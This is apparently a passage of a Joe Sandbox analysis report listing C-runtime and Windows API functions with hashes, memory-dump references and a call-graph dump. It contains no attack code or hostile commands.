                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                                                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2395185920-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _fseek_malloc_memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 208892515-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                                                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                                                                                                                                                                                                                                          • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_1_400000_wdmvmswJ.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:3.9%
                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:11
                                                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 18436 26903 18437 2690f 18436->18437 18438 26934 18437->18438 18439 2693b Sleep 18437->18439 18440 26953 _amsg_exit 18438->18440 18442 2695d 18438->18442 18439->18437 18440->18442 18441 2699f _initterm 18445 269ba __IsNonwritableInCurrentImage 18441->18445 18442->18441 18443 26980 18442->18443 18442->18445 18450 209b1 GetCurrentThreadId OpenThread 18445->18450 18509 1e2af 18450->18509 18452 209e8 HeapSetInformation RegOpenKeyExW 18453 2e9c5 RegQueryValueExW RegCloseKey 18452->18453 18454 20a18 18452->18454 18457 2e9f5 18453->18457 18519 21f5b 18454->18519 18672 163bd 18457->18672 18460 20a41 18532 187ca 8 API calls 18460->18532 18465 2ea08 18501 20a87 18465->18501 18687 21e70 18465->18687 18468 2ea58 _setjmp3 18470 2ea82 18468->18470 18471 2ea6f 18468->18471 18472 163bd 448 API calls 18470->18472 18495 2eaa4 18470->18495 18471->18470 18478 2ea73 18471->18478 18475 2ea92 18472->18475 18474 21e70 448 API calls 18474->18478 18479 34840 453 API calls 18475->18479 18476 2ea52 18476->18468 18477 2eab1 18480 2eac6 18477->18480 18481 2eab5 _setmode 18477->18481 18478->18474 18482 2ea3c 18478->18482 18483 2ea9a 18479->18483 18698 262c0 18480->18698 18481->18480 18487 21e70 448 API calls 18483->18487 18483->18495 18487->18483 18488 2eacc EnterCriticalSection LeaveCriticalSection 18491 1c570 581 API calls 18488->18491 18490 20ada exit 18490->18501 18492 2eafa 18491->18492 18492->18488 18499 2eb06 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo 18492->18499 18500 2eb75 18492->18500 18493 1e2af 4 API calls 18493->18501 18494 21e70 448 API calls 18494->18501 18693 1dd98 _get_osfhandle GetFileType 18495->18693 18496 2ea32 18496->18482 18497 21e70 448 API calls 18496->18497 18497->18496 18502 1e2af 4 API calls 18499->18502 18500->18482 18503 21e70 448 API calls 18500->18503 18501->18476 18501->18490 18501->18494 18501->18496 18598 1e310 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 18501->18598 18607 1c570 18501->18607 18623 1e470 18501->18623 18504 2eb40 18502->18504 18503->18500 18505 1e470 918 API calls 18504->18505 18506 1e310 12 API calls 18504->18506 18505->18504 18507 2eb54 GetConsoleOutputCP GetCPInfo 18506->18507 18508 1e2af 4 API calls 18507->18508 18508->18492 18510 1e2ca 18509->18510 18511 1e2bc SetThreadUILanguage 18509->18511 18512 1e2d4 GetModuleHandleW 18510->18512 18513 1e2ef 18510->18513 18511->18452 18512->18513 18515 1e307 18512->18515 18513->18515 18516 1e2f3 GetProcAddress 18513->18516 18515->18511 18517 1e30b SetThreadLocale 18515->18517 18516->18515 18517->18452 18520 20a31 18519->18520 18521 21f91 18519->18521 18525 21f1a GetConsoleOutputCP GetCPInfo 18520->18525 18521->18520 18522 21fab VirtualQuery 18521->18522 18522->18520 18524 21fbd 18522->18524 18523 21fc7 VirtualQuery 18523->18520 18523->18524 18524->18520 18524->18523 18526 2f185 GetThreadLocale 18525->18526 18527 21f39 memset 18525->18527 18529 2f196 18526->18529 18528 21f5a 18527->18528 18527->18529 18528->18460 18530 2f20b 18529->18530 18531 2f1ee memset 18529->18531 18530->18460 18531->18529 18533 1e310 12 API calls 18532->18533 18534 1884f 18533->18534 18729 1a9d4 GetEnvironmentStringsW 18534->18729 18538 1885e 18743 18273 18538->18743 18541 18873 18541->18541 18542 18b2f 18541->18542 18765 21a05 18541->18765 18544 178e4 448 API calls 18542->18544 18546 18b42 18544->18546 19064 27d18 18546->19064 18547 188a5 GetCommandLineW 18548 188b8 18547->18548 18770 1e3f0 18548->18770 18553 188e1 18781 18e9e 18553->18781 18599 1e343 18598->18599 18600 1e357 _get_osfhandle GetConsoleMode 18598->18600 18599->18600 18601 1e3bc _get_osfhandle SetConsoleMode 18599->18601 18602 1e372 18600->18602 18605 1e3a0 GetConsoleOutputCP GetCPInfo 18600->18605 18601->18600 18603 1e3df 18601->18603 18604 1e381 _get_osfhandle SetConsoleMode 18602->18604 18602->18605 18603->18600 18606 2dc1d _get_osfhandle SetConsoleMode 18603->18606 18604->18605 18605->18493 18606->18600 18608 1c5d3 18607->18608 18609 1c594 18607->18609 18611 1c695 VirtualFree 18608->18611 18612 1c5fe _setjmp3 18608->18612 18609->18608 18610 1c59e GetProcessHeap RtlFreeHeap 18609->18610 18610->18608 18610->18609 18611->18608 18622 1c666 18611->18622 18613 1c63c 18612->18613 18618 1c683 18612->18618 20252 1a8c4 18613->20252 18616 1c66f 18616->18618 20281 38791 18616->20281 18617 1c64d 18617->18616 20263 1cc70 18617->20263 18618->18501 18621 2d0f0 18621->18621 18622->18616 20272 38959 18622->20272 18624 1e517 18623->18624 18625 1e48a 18623->18625 18624->18501 18625->18624 18626 1e4cc 18625->18626 18627 1e4ae memset 18625->18627 18629 1e5ad 18626->18629 18630 1e501 18626->18630 18634 1e4d9 18626->18634 20958 1e670 18627->20958 18633 1dcd0 448 API calls 18629->18633 18630->18624 18643 1e670 457 API calls 18630->18643 18631 1e572 20991 19ef2 memset 18631->20991 18632 1e4e9 18636 1e531 18632->18636 18637 1e4ef 18632->18637 18638 1e5b7 18633->18638 18634->18631 18634->18632 18640 1e544 18636->18640 18641 1e55f 18636->18641 20885 1ad60 GetConsoleTitleW 18637->20885 18638->18630 18644 1e627 18638->18644 21096 1ed90 18638->21096 18646 1e588 18640->18646 18647 1e54c 18640->18647 20986 1ab50 18641->20986 18643->18624 21130 257ea 18644->21130 18645 1e583 18645->18630 21041 20390 18646->21041 18652 1e592 18647->18652 18653 1e554 18647->18653 18657 1e4f6 18652->18657 21044 20740 18652->21044 20973 203b0 18653->20973 18655 1e631 18655->18630 18662 1dcd0 448 API calls 18655->18662 18657->18630 18660 1a125 2 API calls 18657->18660 18658 1e5dd 18661 1f410 464 API calls 18658->18661 18660->18630 18663 1e5eb 18661->18663 18664 1e641 18662->18664 18663->18644 18665 1e5f0 18663->18665 18664->18630 18666 1e64b 18664->18666 18667 19ef2 459 API calls 18665->18667 18668 1ec2e 448 API calls 18666->18668 18669 1e5f9 18667->18669 18668->18665 18669->18630 21100 22081 18669->21100 18673 1790c 448 API calls 18672->18673 18674 163dc 18673->18674 18675 34840 GetStdHandle 18674->18675 18676 163bd 448 API calls 18675->18676 18677 3485e 18676->18677 18678 348c5 18677->18678 18679 1dd98 6 API calls 18677->18679 18680 19950 448 API calls 18678->18680 18682 3486b 18679->18682 18681 348cf 18680->18681 18681->18465 18683 348b5 18682->18683 18684 34878 FlushConsoleInputBuffer _getch 18682->18684 18685 34799 448 API calls 18683->18685 18684->18678 18686 34891 EnterCriticalSection LeaveCriticalSection 18684->18686 18685->18678 18686->18678 22581 21ea6 18687->22581 18689 21e7c 18690 21e82 18689->18690 18691 18bc7 446 API calls 18689->18691 18690->18465 18692 21e92 GetProcessHeap RtlFreeHeap 18691->18692 18692->18690 18694 1ddbd 18693->18694 18695 1ddca 18693->18695 18694->18477 18696 1ddd6 GetStdHandle 18695->18696 18697 1ddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18695->18697 18696->18697 18697->18694 22589 2643a NtOpenThreadToken 18698->22589 18701 31ef3 RtlNtStatusToDosError SetLastError 18704 31f01 18701->18704 18702 26302 18703 31f51 18702->18703 18702->18704 18705 26319 18702->18705 18708 31f59 GetConsoleTitleW 18703->18708 18706 1ab7f 2 API calls 18704->18706 18722 31fdc 18704->18722 22598 2640a FormatMessageW 18705->22598 18728 26395 18706->18728 18709 31f79 wcsstr 18708->18709 18712 263c1 18708->18712 18709->18712 18713 31f92 18709->18713 18710 31f3d 18716 178e4 448 API calls 18710->18716 18711 263d8 18717 263e2 LocalFree 18711->18717 18718 263e9 18711->18718 18712->18711 18715 1dc60 2 API calls 18712->18715 18712->18722 18714 31fa0 wcsstr 18713->18714 18714->18712 18714->18714 18715->18711 18720 31f4a 18716->18720 18717->18718 18718->18710 18721 263f1 18718->18721 18719 26332 18719->18710 18719->18711 18725 1dcd0 448 API calls 18719->18725 18720->18488 18723 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18721->18723 18726 26400 18723->18726 18724 263b4 SetConsoleTitleW 18724->18712 18727 26369 18725->18727 18726->18488 18727->18708 18727->18711 18727->18728 18728->18710 18728->18712 18728->18724 18730 1a9e6 18729->18730 18731 18854 18729->18731 18732 1a9ee GetProcessHeap RtlAllocateHeap 18730->18732 18735 18b96 GetProcessHeap HeapAlloc 18731->18735 18733 1aa11 FreeEnvironmentStringsW 18732->18733 18734 1aa06 memcpy 18732->18734 18733->18731 18734->18733 18736 2b5ce 18735->18736 18737 18bb4 18735->18737 18736->18538 18738 1a9d4 5 API calls 18737->18738 18739 18bb9 18738->18739 18740 2b5b2 GetProcessHeap RtlFreeHeap 18739->18740 18741 18bc3 18739->18741 18742 178e4 448 API calls 18740->18742 18741->18538 18742->18736 18763 18282 18743->18763 18744 182bd RegOpenKeyExW 18745 182e1 RegQueryValueExW 18744->18745 18744->18763 18746 18321 RegQueryValueExW 18745->18746 18745->18763 18748 18371 RegQueryValueExW 18746->18748 18746->18763 18747 18552 time srand 18749 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18747->18749 18751 183ab RegQueryValueExW 18748->18751 18748->18763 18752 18570 GetCommandLineW 18749->18752 18750 2b11a _wtol 18750->18746 18754 183fb RegQueryValueExW 18751->18754 18751->18763 18752->18541 18753 2b146 _wtol 18753->18748 18756 1846c RegQueryValueExW 18754->18756 18754->18763 18755 2b18e _wtol 18755->18751 18756->18763 18757 2b1ba wcstol 18757->18763 18758 2b1dc wcstol 18758->18763 18759 2b218 wcstol 18759->18763 18760 184fa RegQueryValueExW 18761 18534 RegCloseKey 18760->18761 18760->18763 18761->18763 18762 2b28c ExpandEnvironmentStringsW 18762->18763 18763->18744 18763->18746 18763->18747 18763->18748 18763->18750 18763->18751 18763->18753 18763->18754 18763->18755 18763->18756 18763->18757 18763->18758 18763->18759 18763->18760 18763->18761 18763->18762 19068 1acb0 18763->19068 19078 26e25 18765->19078 18767 21a27 18768 1889a 18767->18768 18769 21a2f memset 18767->18769 18768->18542 18768->18547 18769->18768 18771 1e405 18770->18771 18772 188d9 18770->18772 18773 26e25 4 API calls 18771->18773 18772->18542 18772->18553 18774 1e422 18773->18774 18775 2dc4a 18774->18775 18776 1e42d 18774->18776 19090 334d4 18775->19090 18777 1e441 memset 18776->18777 18778 2dc6b ??_V@YAXPAX 18776->18778 18777->18772 18782 18ec1 GetCurrentDirectoryW 18781->18782 18783 18ede towupper 18781->18783 18784 18ec9 18782->18784 19160 1ec2e GetEnvironmentVariableW 18783->19160 18786 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 18784->18786 18788 188fc 18786->18788 18790 200e9 memset 18788->18790 18789 2b787 towupper 18791 1e3f0 17 API calls 18790->18791 18792 2013e 18791->18792 18793 20146 18792->18793 18794 2e615 18792->18794 18796 20151 GetModuleFileNameW 18793->18796 18797 2e627 18793->18797 18795 21e70 448 API calls 18794->18795 18799 2e61f exit 18794->18799 18795->18794 18798 1ec2e 448 API calls 18796->18798 19303 1a976 18797->19303 18800 20168 18798->18800 18799->18797 18800->18797 18802 20170 18800->18802 18804 1ec2e 448 API calls 18802->18804 18803 2e63e 18807 1a976 8 API calls 18803->18807 18805 2017c 18804->18805 18805->18803 18806 20184 18805->18806 18808 1ec2e 448 API calls 18806->18808 18810 2e64f 18807->18810 18809 20190 18808->18809 18809->18810 18813 1a976 8 API calls 18810->18813 19065 27d1d 19064->19065 19066 21e70 448 API calls 19065->19066 19067 27d28 exit 19065->19067 19066->19065 19069 1acc0 19068->19069 19069->19069 19072 1dcd0 19069->19072 19071 1acd8 19071->18763 19073 2d9da 19072->19073 19074 1dcde GetProcessHeap HeapAlloc 19072->19074 19076 178e4 446 API calls 19073->19076 19074->19073 19075 1dcf6 19074->19075 19075->19071 19077 2d9e3 19076->19077 19077->19071 19079 26e30 __EH_prolog3_catch 19078->19079 19082 2742d 19079->19082 19081 26e48 19081->18767 19083 27441 malloc 19082->19083 19084 27434 _callnewh 19083->19084 19085 2744f 19083->19085 19084->19083 19086 27451 19084->19086 19085->19081 19089 274d1 ??0exception@@QAE@ABQBDH 19086->19089 19088 277ec _CxxThrowException 19089->19088 19093 3345e 19090->19093 19096 332e4 19093->19096 19097 332f6 19096->19097 19104 32e74 19097->19104 19100 333a9 19102 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19100->19102 19103 333ba 19102->19103 19103->18772 19105 32ead 19104->19105 19106 32ea3 19104->19106 19108 32f1d GetCurrentThreadId 19105->19108 19106->19105 19107 3345e 9 API calls 19106->19107 19107->19105 19109 32f6c 19108->19109 19110 33061 19109->19110 19120 32e37 19109->19120 19113 33036 OutputDebugStringW 19115 32fe7 19113->19115 19115->19100 19116 3392b 19115->19116 19117 33941 19116->19117 19118 3394c memset 19116->19118 19117->19118 19119 3397a 19118->19119 19121 32e42 19120->19121 19122 32e4e 19120->19122 19121->19122 19123 32e5d IsDebuggerPresent 19121->19123 19122->19113 19122->19115 19124 32859 19122->19124 19123->19122 19125 32885 19124->19125 19134 32a23 19124->19134 19128 3290d FormatMessageW 19125->19128 19125->19134 19126 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19127 32a60 19126->19127 19127->19113 19129 32963 19128->19129 19130 3294c 19128->19130 19131 33067 _vsnwprintf 19129->19131 19153 33067 19130->19153 19133 3295e 19131->19133 19134->19126 19156 19a8d 19153->19156 19157 19a98 19156->19157 19161 1ec64 19160->19161 19163 18f0d 19160->19163 19162 1ec71 _wcsicmp 19161->19162 19161->19163 19164 1ec87 _wcsicmp 19162->19164 19173 1ed59 19162->19173 19163->18784 19163->18789 19165 1ec9d _wcsicmp 19164->19165 19167 1ed47 19164->19167 19165->19167 19168 1ecb3 _wcsicmp 19165->19168 19166 18e9e 436 API calls 19169 1ed6c 19166->19169 19210 19abf 19167->19210 19171 1ecc9 _wcsicmp 19168->19171 19172 2ddef GetCommandLineW 19168->19172 19214 16854 19169->19214 19171->19169 19174 1ecdf _wcsicmp 19171->19174 19172->19163 19173->19166 19175 1ecf1 _wcsicmp 19174->19175 19176 1ed24 19174->19176 19178 1ed07 _wcsicmp 19175->19178 19179 2ddfa rand 19175->19179 19185 19310 19176->19185 19178->19163 19182 2de06 GetNumaHighestNodeNumber 19178->19182 19179->19167 19180 1ed30 19180->19163 19253 26c78 19180->19253 19182->19167 19186 1933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19185->19186 19187 2bbbc 19185->19187 19188 2bbd9 19186->19188 19189 1938d 19186->19189 19256 348d7 19187->19256 19205 2bbd1 19188->19205 19262 18791 GetUserDefaultLCID 19188->19262 19192 193cd 19189->19192 19193 2bbcc 19189->19193 19196 19abf _vsnwprintf 19192->19196 19194 19950 441 API calls 19193->19194 19194->19205 19198 193d6 19196->19198 19202 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19198->19202 19199 19abf _vsnwprintf 19199->19205 19200 2bc11 19206 2bd10 19200->19206 19209 2bcd0 memmove 19200->19209 19201 18791 GetUserDefaultLCID 19204 193fe 19202->19204 19204->19180 19205->19199 19208 2bdbf 19205->19208 19264 1998d 19205->19264 19206->19201 19209->19200 19211 19acd 19210->19211 19212 19aee 19211->19212 19300 19afb _vsnwprintf 19211->19300 19212->19173 19215 16b0c 19214->19215 19216 1688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19214->19216 19218 348d7 6 API calls 19215->19218 19217 168ec 19216->19217 19226 2a562 19216->19226 19220 18791 GetUserDefaultLCID 19217->19220 19219 2a4c2 19218->19219 19219->19180 19221 16906 GetLocaleInfoW 19220->19221 19238 16915 19221->19238 19222 2a5f9 19227 19abf _vsnwprintf 19222->19227 19223 2a5df realloc 19223->19222 19223->19226 19224 16966 19225 18791 GetUserDefaultLCID 19224->19225 19228 1698e GetDateFormatW 19225->19228 19226->19222 19226->19223 19232 178e4 434 API calls 19226->19232 19229 2a62a 19227->19229 19230 16a96 19228->19230 19231 1699d 19228->19231 19235 2a63e 19229->19235 19246 2a64d 19229->19246 19231->19230 19232->19226 19239 19950 434 API calls 19235->19239 19238->19224 19243 2a523 memmove 19238->19243 19244 16a75 memmove 19238->19244 19249 2a649 19239->19249 19243->19238 19244->19238 19248 19950 434 API calls 19246->19248 19248->19249 19302 26b40 